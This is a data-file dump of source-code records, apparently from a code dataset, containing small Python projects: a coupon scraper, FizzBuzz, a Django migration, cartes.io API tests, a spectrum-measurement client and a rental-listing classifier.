blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e310d84ef134fa90d02ddbcb43eb4159e92125c2 | 7d4597b6f9b631dd1f91059a4d904d2847e29a9c | /offerSpider/spiders/saveon.py | b9e4eb0faa58041584990acba2c7d8d25a7d856e | [] | no_license | lychlov/offerSpider | 6efc1b47e235902252ad0534f916d7f0baa49d00 | 8559ae3c65538d365aa11598d1070a4eadc82a1f | refs/heads/master | 2020-03-23T14:42:41.796002 | 2019-01-24T03:20:51 | 2019-01-24T03:20:51 | 141,694,389 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,760 | py | # # -*- coding: utf-8 -*-
# import re
#
# import requests
# import scrapy
# from bs4 import BeautifulSoup
#
# from offerSpider.util import get_header
# from offerSpider.items import CouponItem
#
#
# class SaveonSpider(scrapy.Spider):
# name = 'saveon'
# allowed_domains = ['saveoncannabis.com']
# start_urls = ['https://www.saveoncannabis.com/stores']
# page_url = 'https://www.saveoncannabis.com/stores/%s/'
#
# def parse(self, response):
# html = response.body
# soup = BeautifulSoup(html, 'lxml')
# if not re.findall(r'/stores/(.+?)/', response.url):
# max_page = int(soup.find('ul', class_='page-numbers').find('a').text)
# for i in range(2, max_page + 1):
# yield scrapy.Request(url=self.page_url % i, callback=self.parse)
# stores = soup.find_all('div', class_='store-logo')
# for store in stores:
# link = store.find('a').get('href')
# yield scrapy.Request(url=link, callback=self.store_parse)
# pass
#
# def store_parse(self, response):
# html = response.body
# soup = BeautifulSoup(html, 'lxml')
# main_coupon_info = soup.find('div', class_='store-offer-featured')
# if main_coupon_info:
# main_coupon = CouponItem()
# main_coupon['type'] = 'coupon'
# main_coupon['name'] = main_coupon_info.find('h2').text.strip()
# main_coupon['site'] = 'saveoncannabis.com'
# main_coupon['description'] = ''
# main_coupon['verify'] = True
# main_coupon['link'] = ''
# main_coupon['expire_at'] = main_coupon_info.find('div',class_='deal-countdown-info').text.strip().replace('Expires in: ','')
#
# main_coupon['coupon_type'] = 'CODE'
#
# main_coupon['code'] = ''
# main_coupon['final_website'] = ''
# main_coupon['store'] = ''
# main_coupon['store_url_name'] = ''
# main_coupon['store_description'] = ''
# main_coupon['store_category'] = ''
# main_coupon['store_website'] = ''
# main_coupon['store_country'] = ''
# main_coupon['store_picture'] = ''
# main_coupon['created_at'] = ''
# main_coupon['status'] = ''
# main_coupon['depth'] = ''
# main_coupon['download_timeout'] = ''
# main_coupon['download_slot'] = ''
# main_coupon['download_latency'] = ''
# yield main_coupon
#
# coupon_infos = soup.find('div', class_='coupons-other').find_all('div', class_='white-block')
# if coupon_infos:
# for coupon_info in coupon_infos:
# coupon = CouponItem()
# coupon['type'] = 'coupon'
# coupon['name'] = ''
# coupon['site'] = ''
# coupon['description'] = ''
# coupon['verify'] = ''
# coupon['link'] = ''
# coupon['expire_at'] = ''
# coupon['coupon_type'] = ''
# coupon['code'] = ''
# coupon['final_website'] = ''
# coupon['store'] = ''
# coupon['store_url_name'] = ''
# coupon['store_description'] = ''
# coupon['store_category'] = ''
# coupon['store_website'] = ''
# coupon['store_country'] = ''
# coupon['store_picture'] = ''
# coupon['created_at'] = ''
# coupon['status'] = ''
# coupon['depth'] = ''
# coupon['download_timeout'] = ''
# coupon['download_slot'] = ''
# coupon['download_latency'] = ''
# yield coupon
# pass
#
#
# def get_domain_url(long_url):
# domain = re.findall(r'^(http[s]?://.+?)[/?]', long_url + '/')
# return domain[0] if domain else None
#
#
# def get_real_url(url, try_count=1):
# if try_count > 3:
# return url
# try:
# rs = requests.get(url, headers=get_header(), timeout=10, verify=False)
# if rs.status_code > 400 and get_domain_url(rs.url) == 'www.offers.com':
# return get_real_url(url, try_count + 1)
# if get_domain_url(rs.url) == get_domain_url(url):
# target_url = re.findall(r'replace\(\'(.+?)\'', rs.content.decode())
# if target_url:
# return target_url[0].replace('\\', '') if re.match(r'http', target_url[0]) else rs.url
# else:
# return rs.url
# else:
# return get_real_url(rs.url)
# except Exception as e:
# print(e)
# return get_real_url(url, try_count + 1)
| [
"czk499658904@126.com"
] | czk499658904@126.com |
3542a1d22ffb90d42890a2431d8e4b98643f59ec | 4fe4f712cb49f872ae9e35777a47a53290715741 | /authors_hse.py | 6d878d3c7fec402d977da1a1ee52137102218fe3 | [] | no_license | koo2018/liblist | 601cd62827a924f8368d39bd67d18a14a6b3c7de | c7133d4e17a73daf3b75c2a5674f45109ac9edeb | refs/heads/master | 2022-12-19T06:11:54.300114 | 2020-09-17T15:04:21 | 2020-09-17T15:04:21 | 286,531,555 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 731 | py | import json,re
# Candidate corpora paths.
# NOTE(review): `files` is defined but never used below — looks like a leftover.
files = ['origins/mediacom_academ.txt','origins/mediacom_creative.txt','origins/jour_academ.txt','origins/jour_creative.txt',
         'origins_new/allbooks.txt','origins_new/mediacom.txt','origins_new/jour.txt']
# Read the dictionary from file
with open('data.json', 'r') as f:
    data = json.loads(str(f.read()))
with open('authors/authors.txt', 'r') as auth_f:
    authors = auth_f.readlines()
# For every author, build a short key from the first two tokens of the line
# ("Surname N.") and print each catalogue entry whose field '0' contains it.
for person in authors:
    # presumably lines look like "Surname Name ..." — first token plus initial; TODO confirm
    pers = person.split()[0].strip()+" "+person.split()[1].strip()[:1]+"."
    for dt in data:
        for dt1 in data[dt]:
            if pers in data[dt][dt1]['0']:
                print (str(dt).split("/")[1], person.strip(), "=>", data[dt][dt1]['0'])
| [
"kookoondra@gmail.com"
] | kookoondra@gmail.com |
8a2298a365b556a735933c0a51bd7af1d2150fa2 | 6061f1ce64586340c6362226cebac321d0dd9499 | /FizzBuzzer/fizzbuzz.py | 92374a8e7ad08ee82300c93500cf000655d4a018 | [] | no_license | work777/FizzBuzz | 4381ff30c6d69e1842d783f5f7c93b13623fa3a4 | dbf9aef4be2fc70209f6c75c743a4667424173a4 | refs/heads/master | 2020-05-22T22:48:24.097378 | 2017-03-15T14:32:06 | 2017-03-15T14:32:06 | 84,731,965 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 725 | py | # FizzBuzz Game
# ANSI escape template that renders {0} in bright green in the terminal.
colorgreen = "\033[1;32m{0}\033[00m"
# Prompt (Python 2 raw_input) until the user supplies a number in [1, 100].
a = int(raw_input("Please insert number between 1 and 100: "))
while a < 1 or a > 100:
    if a < 1:
        print "number lower than minimum amount (1)"
    if a > 100:
        print "number exceeding maximum amount (100)"
    a = int(raw_input("Please insert number between 1 and 100: "))
# Classic FizzBuzz over 1..a: multiples of 15 -> "fizzbuzz!" (in green),
# multiples of 3 -> "fizz", multiples of 5 -> "buzz", otherwise the number.
for c in range (a):
    d=c+1
    divisable_by_three = d % 3
    divisable_by_five = d % 5
    divisable_by_fifteen = d % 15
    if divisable_by_fifteen == 0:
        print colorgreen.format("fizzbuzz!")
    elif divisable_by_three == 0:
        print "fizz"
    elif divisable_by_five == 0:
        print "buzz"
    else:
        print d
# Imported at the bottom of the script, just before the final delay that
# keeps the console window open.
import time
time.sleep(10) | [
"andy911@gmx.com"
] | andy911@gmx.com |
3655a1d7009c58072673e92b9dcc169dbed6d245 | bcbcd360967d9f79ef542ead5b30de42ec61b2d3 | /code_v1_recovered/Unigrams/top100LinksPerCom.py | 4a2b7812a4374ffdf8f5fa87ecf736bcdf22e711 | [] | no_license | Roja-B/EvolvingComs | d00b30576e6b8977ce1be0c6317155bfeb711806 | b58fa29972d9aad095ed0f364b1e0ec876b9b6c5 | refs/heads/master | 2020-04-14T18:30:48.657243 | 2013-02-11T05:54:16 | 2013-02-11T05:54:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,233 | py | import operator
import sys
from noLow import *
# this program produces the list of top 100 links per community based on the Chi-squared table for each time window
#PATH = raw_input('Enter data path: ')
#M = int(raw_input('Enter the number of communities: '))
#tablefilename = raw_input("Enter file name: ")
pathfile = open("PATHSplusCOMS","r")
tablefilename = "Chi2.txt"
for line in pathfile:
line = line.strip()
L = line.split("\t")
PATH = L[0]+"/RelevantLinks"
M = int(L[1])
f = open(PATH+'/'+tablefilename,"r")
Communities= []
#for each community we need a hash table
for i in range(M):
Communities.append(dict())
for line in f:
link = line.split('\t')[0]
for i in range(0,M):
count = float(line.split('\t')[i+1])
Communities[i][link] = count
for i in range(0,M):
sorted_com = sorted(Communities[i].iteritems(), key=operator.itemgetter(1),reverse=True)
t = open(PATH+"/NoLowtop50Links"+str(i),"w")
length = len(sorted_com)
count = 0
for j in range(length)):
if linkvotes[sorted_com[j][0]] < 10 : continue
t.write("link "+sorted_com[j][0]+' '+str(sorted_com[j][1])+'\n')
count +=1
if count == 50: break
t.close()
f.close()
pathfile.close()
| [
"roja@ucla.edu"
] | roja@ucla.edu |
76dc1400b29bc1a620d6aa9777f6190b1f171f74 | 9e06099975a9ed25758af8bc99924b1603ab738f | /medium/p55_jump_game.py | 7b00f1c18c871bf5c80bfdd61e1e48b85f047c3d | [] | no_license | Yohan923/leetcode_python | 803a76f04c9cd3ce35d2ea1b0ce101a76d5718a2 | b2043827840e4fb380901406537f80adb1a1d190 | refs/heads/master | 2020-03-30T20:16:48.656432 | 2019-09-25T13:11:14 | 2019-09-25T13:11:14 | 151,581,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 990 | py | """
Given an array of non-negative integers, you are initially positioned at the first index of the array.
Each element in the array represents your maximum jump length at that position.
Determine if you are able to reach the last index.
"""
GOOD = True
class Solution:
# time limit
# DP bottom up
def can_jump(self, nums):
nums[len(nums) - 1] = GOOD
for i in range(len(nums) - 2, -1, -1):
max_length = min(i + nums[i] + 1, len(nums))
for j in range(i + 1, max_length):
if nums[j] is GOOD:
nums[i] = GOOD
break
return nums[0] is GOOD
# only ever reach the right most GOOD anyways from bottom up method
def can_jump_greedy(self, nums):
cur_good = len(nums) - 1
for i in range(len(nums) - 2, -1, -1):
if cur_good <= i + nums[i]:
cur_good = i
return cur_good == 0
"""
:type nums: List[int]
:rtype: bool
"""
| [
"johnz0923@gmail.com"
] | johnz0923@gmail.com |
057c68d069a43d8f9a58ad6455d49dee7e050db9 | 91056388c845468e0eb2acba3f605c8e57c8e789 | /0/hello-student.py | a27ac0d03645073b11192027b1b3111dc2b387b5 | [] | no_license | skopjehacklab/programming-101-exercises | 96dde61dfff76e0bc90ab259895d16bb877ec487 | c306f2969ee34d2771cd0247db2317636a8b729a | refs/heads/master | 2021-01-10T19:23:21.766724 | 2015-11-11T17:55:29 | 2015-11-11T17:55:29 | 42,821,254 | 6 | 17 | null | 2015-10-19T18:04:39 | 2015-09-20T17:00:37 | Python | UTF-8 | Python | false | false | 24 | py | print("Hello student!")
| [
"andrejtrajchevski@gmail.com"
] | andrejtrajchevski@gmail.com |
7c6e69f50efaff6c5df3cda141705dc27ef4c624 | 617b08a3f7c84cc76ac18cd241c3c45d2e21f6dd | /tests/test_mapper.py | 93d9b9e177d6bbcdc72f1734c9af9d838ca2101b | [] | no_license | talhahkazi93/projects | 6cbe3f5819a459be2b462935ea5560fedf7341ca | ab46ab8572d10787a298ea5d5e57a379ff58c4a4 | refs/heads/main | 2021-10-08T12:59:18.484677 | 2021-10-04T03:50:12 | 2021-10-04T03:50:12 | 141,942,615 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 993 | py | import string
from mapper.mapper import create_map,create_markers,list_markers,edit_markers
import random
# Base URL of the cartes.io service.
# NOTE(review): `Baseurl` is unused in this test module — presumably kept for reference.
Baseurl = 'https://cartes.io/'
# Fixed identifiers of an existing test map/marker (and its edit token) on cartes.io.
test_map_id = "bc105f33-f83b-4eab-89e3-30288c3f2ce9"
test_marker_id = '1431'
test_marker_token = "7muIXhEHClVrhEtWj1BpBhpYHV213TRv"
# Fresh random-but-valid coordinates and a random 7-letter category per test run.
test_longitute = random.randrange(-179,179)
test_latitude = random.randrange(-89,89)
test_category_name= ''.join(random.choices(string.ascii_letters, k=7))
print(test_latitude,test_longitute,test_category_name)
def test_create_map():
    # Create a new map via the cartes.io API; expect HTTP 200 OK.
    res,r = create_map()
    assert r.status_code == 200
def test_create_markers():
    # Add a marker at random coordinates with a random category name;
    # the API answers 201 Created on success.
    res, r = create_markers(map_id=test_map_id,lat=test_latitude,long=test_longitute,cat_name=test_category_name)
    assert r.status_code == 201
def test_list_markers():
    # List all markers of the fixed test map; expect HTTP 200 OK.
    res, r = list_markers(map_id=test_map_id)
    assert r.status_code == 200
def test_edit_markers():
res, r = edit_markers(map_id=test_map_id,marker_id=test_marker_id,token=test_marker_token)
assert r.status_code == 200 | [
"34499780+talhahkazi93@users.noreply.github.com"
] | 34499780+talhahkazi93@users.noreply.github.com |
61eface07e2a27ae86d3c33097cb278cffe65e4f | a6d45b7b0caccc92dd7b0d2cc352498a32f5a181 | /uploader/migrations/0001_initial.py | 52eaec7d149d4ac8deb876b1956156002064a661 | [] | no_license | suhailvs/djangofileupload | e149e27b085f18f69c61074039e08a9c74283ca2 | 40b73cdf5c50bd44a4956ec70cf52d4c358f58c2 | refs/heads/master | 2023-03-23T17:34:53.077721 | 2020-04-20T16:09:29 | 2020-04-20T16:09:29 | 20,531,971 | 9 | 2 | null | null | null | null | UTF-8 | Python | false | false | 565 | py | # Generated by Django 3.0.5 on 2020-04-20 15:29
from django.db import migrations, models
class Migration(migrations.Migration):
    # Initial schema migration for the uploader app
    # (auto-generated by Django 3.0.5, per the header comment).

    # Marks this as the app's first migration.
    initial = True

    # No other migrations need to be applied before this one.
    dependencies = [
    ]

    operations = [
        # Create the Upload table: an uploaded file plus its upload timestamp.
        migrations.CreateModel(
            name='Upload',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('upload_file', models.FileField(upload_to='')),
                ('upload_date', models.DateTimeField(auto_now_add=True)),
            ],
        ),
    ]
| [
"suhailvs@gmail.com"
] | suhailvs@gmail.com |
13fddff98ac344fe3f4a0b18d5c637d314a4e750 | ad657deade0385f6426c1b8abbe73349b7963eab | /modelo/Tarjeta.py | 2e19cfc2546c2365c48b7a80a46c4dcc72382642 | [] | no_license | andres2508/SimonController | 436c7ccbdc3b9b8a11a5e2bc931c7800f459bd06 | 37e4060de3f1f12c6acd55dad4100fff69ea2df9 | refs/heads/master | 2021-01-10T13:48:38.072856 | 2016-03-02T19:35:17 | 2016-03-02T19:35:17 | 43,324,100 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,890 | py | __author__ = 'Andres'
import SocketServer
import socket
# from modelo import Medicion
import Medicion
import threading
import json
import os
import urllib2
class Tarjeta:
    """A measurement card (spectrum-sensing device) reachable over TCP.

    Stores the card's identity and frequency capabilities, runs measurement
    functions through an already-connected socket, persists each sample as a
    JSON file, and finally POSTs the results to the collector service.
    """
    ##---------------------------------------------------------------------------------
    ## Constructor
    ##---------------------------------------------------------------------------------
    def __init__(self, sc, tipo_tarjeta, direccion_ip, minimum_frequency, maximum_frequency, instant_bandwith):
        # sc: connected socket used to drive the device.
        self.tipo_tarjeta = tipo_tarjeta
        self.id_tarjeta = 0
        self.minimum_frequency = minimum_frequency
        self.maximum_frequency = maximum_frequency
        self.instant_bandwith = instant_bandwith
        # NOTE(review): this boolean attribute shadows the isDisponible()
        # method on instances (the instance attribute wins over the class method).
        self.isDisponible = True
        self.direccion_ip = direccion_ip
        self.mediciones = []
        ###
        # Variables Servidor TCP
        ###
        self.socket = sc
        self.isConnected = True

    ##---------------------------------------------------------------------------------
    ## Funcionalidades
    ##---------------------------------------------------------------------------------
    def correr_funcion(self, funcion, measurement_id, start_frec, final_frec, canalization, span_device, time, samples):
        """Run `funcion` `samples` times on the device and upload the results.

        Only the occupation function ("occ") is handled; each sample is
        stored on disk via grabar_samples_measurement() and the whole batch
        is then sent to the collector with send_post_result().
        """
        resultado = "Sin resultado"
        for i in range(0, samples):
            if funcion == "occ":
                nueva_medicion = Medicion.Medicion(funcion,
                                                   "funciones/" + self.tipo_tarjeta + "/Ocupacion/SIMONES_Ocupacion.py",
                                                   start_frec, final_frec, canalization,
                                                   span_device, measurement_id, time)
                resultado = nueva_medicion.correr_medicion(self.socket)
                self.grabar_samples_measurement(resultado, measurement_id, i)
        self.send_post_result(measurement_id, samples)

    def send_post_result(self, measurement_id, samples):
        """POST every stored sample of `measurement_id` to the collector.

        Reads the JSON files written by grabar_samples_measurement() and
        sends each one to the hard-coded collector endpoint.
        """
        data_json = None
        url = 'http://192.168.160.96:9999/post'
        for i in range(0, samples):
            file_name = str(measurement_id) + "-" + str(i)
            with open("/home/andres/Escritorio/SimonController/modelo/results/" + file_name) as data_file:
                data_json = json.load(data_file)
            # Single-argument print() behaves identically on Python 2 and 3.
            print("ESTE ES EL JSON")
            print(data_json)
            req = urllib2.Request(url)
            req.add_header('Content-Type', 'application/json')
            response = urllib2.urlopen(req, data_json)

    def grabar_samples_measurement(self, resultado, measurement_id, counter):
        """Persist one sample as JSON in a file named "<measurement_id>-<counter>".

        NOTE(review): the results directory is an absolute, machine-specific
        path; consider making it configurable.
        """
        file_name = str(measurement_id) + "-" + str(counter)
        with open("/home/andres/Escritorio/SimonController/modelo/results/" + file_name, "w") as outfile:
            json.dump(resultado, outfile)

    def buscar_medicion(self, measurement_id):
        # Stub: measurement lookup is not implemented yet.
        return "hola"

    ##---------------------------------------------------------------------------------
    ## Gets and Sets
    ##---------------------------------------------------------------------------------
    def getMinimum_Frecuency(self):
        # Fixed: previously read the never-assigned `minimum_frecuency`
        # attribute, raising AttributeError (the constructor sets minimum_frequency).
        return self.minimum_frequency

    def getMaximum_Frecuency(self):
        # Fixed: same misspelled-attribute bug as getMinimum_Frecuency().
        return self.maximum_frequency

    def getInstant_Bandwith(self):
        return self.instant_bandwith

    def isDisponible(self):
        # NOTE(review): unreachable on normal instances — __init__ assigns a
        # boolean attribute of the same name, which shadows this method.
        return self.isDisponible

    def setMinimum_Frecuency(self, minimum_frecuency):
        # Fixed: now updates the attribute the constructor and getter actually use.
        self.minimum_frequency = minimum_frecuency

    def setMaximum_Frecuency(self, maximum_frecuency):
        # Fixed: now updates the attribute the constructor and getter actually use.
        self.maximum_frequency = maximum_frecuency

    def getTipo_tarjeta(self):
        return self.tipo_tarjeta

    def getId_tarjeta(self):
        return self.id_tarjeta
| [
"jaime.aristizabal.2508@gmail.com"
] | jaime.aristizabal.2508@gmail.com |
8405b0d28ef4de717b23a6316d12d896d87bf050 | 3f348ca2d86f7a272f4eaaa15327066f37478737 | /MySigma_4.py | 34ecb7d197c7576774e90f52ea712e6f83462c43 | [] | no_license | christinaengg/Two-sigma-connect-Rental-Listing-Inquiries | a04995c33e43ebc71a99302547508d72693e0fe1 | 7d5f8f9d464ff006a2c34666df5237fe4b8fec8f | refs/heads/master | 2021-01-20T08:33:35.044965 | 2017-05-03T01:41:16 | 2017-05-03T01:41:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,898 | py | import numpy as np
import pandas as pd
#Import train and test json files as dataframes
train_df = pd.read_json(open("train.json", "r"))
test_df = pd.read_json(open("test.json", "r"))
#print(train_df.tail())
# Data exploration: the describe() summaries were inspected interactively,
# so their return values are intentionally discarded here.
train_df.describe()
test_df.describe()
# Outlier handling for bedrooms/bathrooms/price was explored and then
# disabled; price is clipped to 13000 later in the feature-engineering section.
#print(train_df.bathrooms.unique())
#print(test_df.bathrooms.unique())
#print(train_df.bedrooms.unique())
#print(test_df.bedrooms.unique())
#test_df["bathrooms"].loc[19671] = 1.5
#test_df["bathrooms"].loc[22977] = 2.0
#test_df["bathrooms"].loc[63719] = 2.0
#train_df["price"] = train_df["price"].clip(upper=13000)
#See the frequency of each feature and rank them based on frequency
'''import collections
def most_common(lst):
features = collections.Counter(lst)
feature_value = features.keys()
frequency = features.values()
data = [('feature_value', feature_value),
('frequency', frequency),]
df = pd.DataFrame.from_items(data)
return df.sort_values(by = 'frequency', ascending = False)'''
#Function to make a new column for features
def newColumn(name, df, series):
    """Attach a 0/1 indicator column called `name` to `df`.

    `series` holds, per row, the list of feature strings of that listing;
    rows whose list contains `name` are flagged 1, all others 0. The column
    is assigned in place and the (mutated) frame is returned for chaining.
    """
    flags = [1 if name in feature_list else 0 for feature_list in series]
    df[name] = pd.Series(flags, df.index, name=name)
    return df
# Amenity features selected by frequency of occurrence in the listings;
# each becomes its own 0/1 indicator column on both frames via newColumn().
facilities = ['Elevator','Cats Allowed','Hardwood Floors','Dogs Allowed','Doorman','Dishwasher','No Fee','Laundry in Building','Fitness Center',
              'Pre-War', 'Laundry in Unit', 'Roof Deck', 'Outdoor Space', 'Dining Room', 'High Speed Internet', 'Balcony', 'Swimming Pool']
for name in facilities:
    train_df = newColumn(name, train_df, train_df['features'])
    test_df = newColumn(name, test_df, test_df['features'])
#print(train_df.head()
# Derive date parts and a photo count from the listing metadata (train set).
train_df["created"] = pd.to_datetime(train_df["created"])
train_df["created_year"] = train_df["created"].dt.year
train_df["created_month"] = train_df["created"].dt.month
train_df["created_day"] = train_df["created"].dt.day
train_df["num_photos"] = train_df["photos"].apply(len)
# Same derived attributes for the test set.
test_df["created"] = pd.to_datetime(test_df["created"])
test_df["created_year"] = test_df["created"].dt.year
test_df["created_month"] = test_df["created"].dt.month
test_df["created_day"] = test_df["created"].dt.day
test_df["num_photos"] = test_df["photos"].apply(len)
# Price features: cap outliers at 13000, then log-price, price per bedroom,
# total rooms and price per room.
# NOTE(review): listings with 0 bedrooms/rooms produce inf here — verify
# downstream models tolerate that.
train_df['price'] = train_df['price'].clip(upper=13000)
train_df["logprice"] = np.log(train_df["price"])
train_df["price_t"] =train_df["price"]/train_df["bedrooms"]
train_df["room_sum"] = train_df["bedrooms"]+train_df["bathrooms"]
train_df['price_per_room'] = train_df['price']/train_df['room_sum']
# Identical price features for the test set.
test_df['price'] = test_df['price'].clip(upper=13000)
test_df["logprice"] = np.log(test_df["price"])
test_df["price_t"] =test_df["price"]/test_df["bedrooms"]
test_df["room_sum"] = test_df["bedrooms"]+test_df["bathrooms"]
test_df['price_per_room'] = test_df['price']/test_df['room_sum']
# Build a coarse location key: round coordinates to 2 decimals and join
# them into a single "lat, long" string used as a merge key below.
train_df['latitude'] = round(train_df['latitude'], 2)
train_df['longitude'] = round(train_df['longitude'], 2)
train_df['latlong'] = train_df.latitude.map(str) + ', ' + train_df.longitude.map(str)
#print(len(train_df['latlong'].unique()))
test_df['latitude'] = round(test_df['latitude'], 2)
test_df['longitude'] = round(test_df['longitude'], 2)
test_df['latlong'] = test_df.latitude.map(str) + ', ' + test_df.longitude.map(str)
#Obtain zip code from unique latitude and longitude positions
'''l = pd.concat([train_df['latlong'], test_df['latlong']]).unique()
ll = pd.DataFrame(l)
#print(len(l))
l1.to_csv('C:/Users/tingt/PycharmProjects/BIA656/Final/neighborhood_new.csv')
from geopy.geocoders import Nominatim
geolocator = Nominatim()
#location = geolocator.reverse(train_df.iloc[484]['latlong'])
#location = geolocator.reverse(l[485])
#print(location.raw['address')
for i in range(581):
location = geolocator.reverse(l[i])
print(location.raw['address']['postcode'])
'''
# Look up the zip code for every unique rounded lat/long pair from a
# pre-geocoded CSV, and give each distinct zip code an integer id.
zipcode = pd.read_csv("neighborhood_new.csv")
#print(len(zipcode['postal_code'].unique()))
z_id = zipcode['postal_code'].unique()
z_id = pd.DataFrame(z_id)
z_id.columns = ['postal_code']
z_id['zip_id'] = [i for i in range(len(z_id))]
zipcode = pd.merge(zipcode, z_id, how = 'left', on = 'postal_code')
# Attach the zip code and its id to both frames via the latlong key,
# dropping the CSV's helper columns.
train_df= pd.merge(train_df, zipcode, how = 'left', on=['latlong'])
train_df = train_df.drop(['void', 'zip_code_index'], 1)
test_df = pd.merge(test_df, zipcode, how = 'left', on=['latlong'])
test_df = test_df.drop(['void', 'zip_code_index'], 1)
#print(train_df.head())
# Label-encode building_id and manager_id: unique ids over train+test are
# numbered consecutively and merged back as integer index columns.
b_id = pd.concat([train_df['building_id'], test_df['building_id']]).unique()
b_id = pd.DataFrame(b_id)
b_id.columns = ['building_id']
b_id['building_index'] = [i for i in range(len(b_id))]
m_id = pd.concat([train_df['manager_id'], test_df['manager_id']]).unique()
m_id = pd.DataFrame(m_id)
m_id.columns = ['manager_id']
m_id['manager_index'] = [i for i in range(len(m_id))]
#print(m_id)
train_df= pd.merge(train_df, b_id, how = 'left', on=['building_id'])
train_df= pd.merge(train_df, m_id, how = 'left', on=['manager_id'])
test_df = pd.merge(test_df, b_id, how = 'left', on=['building_id'])
test_df = pd.merge(test_df, m_id, how = 'left', on=['manager_id'])
#print(train_zip.tail())
# Final model inputs: engineered feature matrix X, and the interest level
# mapped to integers (high=0, medium=1, low=2) as the target vector y.
features_to_use = ["bathrooms", "bedrooms", "price",
                   "num_photos", "Elevator", "Dogs Allowed",'Hardwood Floors','Cats Allowed',
                   'Dishwasher','Doorman', 'No Fee','Laundry in Building','Fitness Center',
                   'Pre-War', 'Laundry in Unit', 'Roof Deck', 'Outdoor Space', 'Dining Room', 'High Speed Internet', 'Balcony', 'Swimming Pool',
                   "created_year", "created_month", "created_day",'building_index', 'manager_index', 'zip_id'
                   ]
target_num_map = {'high':0, 'medium':1, 'low':2}
X = train_df[features_to_use]
y = np.array(train_df['interest_level'].apply(lambda x: target_num_map[x]))
# ---- Modeling ----
# Random Forest: the main model, also used to produce the submission below.
from sklearn.model_selection import train_test_split
from sklearn.metrics import log_loss
from sklearn.metrics import accuracy_score
from sklearn.metrics import roc_auc_score
from sklearn.ensemble import RandomForestClassifier
random_state = 5000
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.34, random_state = 5000)
rf1 = RandomForestClassifier(n_estimators=250, criterion='entropy', n_jobs = 1, random_state=random_state)
rf1.fit(X_train, y_train)
y_val_pred = rf1.predict_proba(X_val)
y_val_pred_acc = rf1.predict(X_val)
# Validation multi-class log-loss (the competition metric) and accuracy.
print(log_loss(y_val, y_val_pred))
print(accuracy_score(y_val, y_val_pred_acc))
# Score the real test set and write the submission file: listing_id plus
# one probability column per interest level.
X_test = test_df[features_to_use]
y_test = rf1.predict_proba(X_test)
sub = pd.DataFrame()
sub["listing_id"] = test_df["listing_id"]
for label in ["high", "medium", "low"]:
    sub[label] = y_test[:, target_num_map[label]]
sub.to_csv("submission.csv", index=False)
# ---- Alternative models: each is fit on the same split and its validation
# log-loss and accuracy are printed for comparison with the Random Forest.
# Logistic Regression
from sklearn.linear_model import LogisticRegression
rf2 = LogisticRegression()
rf2.fit(X_train, y_train)
y_val_pred2 = rf2.predict_proba(X_val)
y_val_pred_acc2 = rf2.predict(X_val)
print(log_loss(y_val, y_val_pred2))
print(accuracy_score(y_val, y_val_pred_acc2))
# Decision tree
from sklearn.tree import DecisionTreeClassifier
rf3 = DecisionTreeClassifier()
rf3.fit(X_train, y_train)
y_val_pred3 = rf3.predict_proba(X_val)
y_val_pred_acc3 = rf3.predict(X_val)
print(log_loss(y_val, y_val_pred3))
print(accuracy_score(y_val, y_val_pred_acc3))
# Naive Bayes
from sklearn.naive_bayes import GaussianNB
rf4 = GaussianNB()
rf4.fit(X_train, y_train)
y_val_pred4 = rf4.predict_proba(X_val)
y_val_pred_acc4 = rf4.predict(X_val)
print(log_loss(y_val, y_val_pred4))
print(accuracy_score(y_val, y_val_pred_acc4))
# Bagging
from sklearn.ensemble import BaggingClassifier
rf5 = BaggingClassifier()
rf5.fit(X_train, y_train)
y_val_pred5 = rf5.predict_proba(X_val)
y_val_pred_acc5 = rf5.predict(X_val)
print(log_loss(y_val, y_val_pred5))
print(accuracy_score(y_val, y_val_pred_acc5))
# KNN
from sklearn.neighbors import KNeighborsClassifier
rf6 =KNeighborsClassifier()
rf6.fit(X_train, y_train)
y_val_pred6 = rf6.predict_proba(X_val)
y_val_pred_acc6 = rf6.predict(X_val)
print(log_loss(y_val, y_val_pred6))
print(accuracy_score(y_val, y_val_pred_acc6))
# AdaBoost (250 estimators, matching the Random Forest's ensemble size)
from sklearn.ensemble import AdaBoostClassifier
rf7 = AdaBoostClassifier(n_estimators=250)
rf7.fit(X_train, y_train)
y_val_pred7 = rf7.predict_proba(X_val)
y_val_pred_acc7 = rf7.predict(X_val)
print(log_loss(y_val, y_val_pred7))
print(accuracy_score(y_val, y_val_pred_acc7))
#Evaulation
'''
#Compare ROC of each Algorithm
import matplotlib.pyplot as plt
from sklearn import metrics
#RandomForest
fpr1, tpr1, threshold1 = metrics.roc_curve(y_val_pred_acc, y_val_pred)
roc_auc1 = metrics.auc(fpr1, tpr1)
plt.title('ROC of RandomForest')
plt.plot(fpr1, tpr1, 'b', label = 'AUC = %0.2f' % roc_auc1)
plt.legend(loc = 'lower right')
plt.plot([0, 1], [0, 1],'r--')
plt.xlim([0, 1])
plt.ylim([0, 1])
plt.ylabel('True Positive Rate')
plt.xlabel('False Positive Rate')
plt.show()
'''
'''#SVM
from sklearn.svm import SVC
rf2 = SVC()
rf2.fit(X_train, y_train)
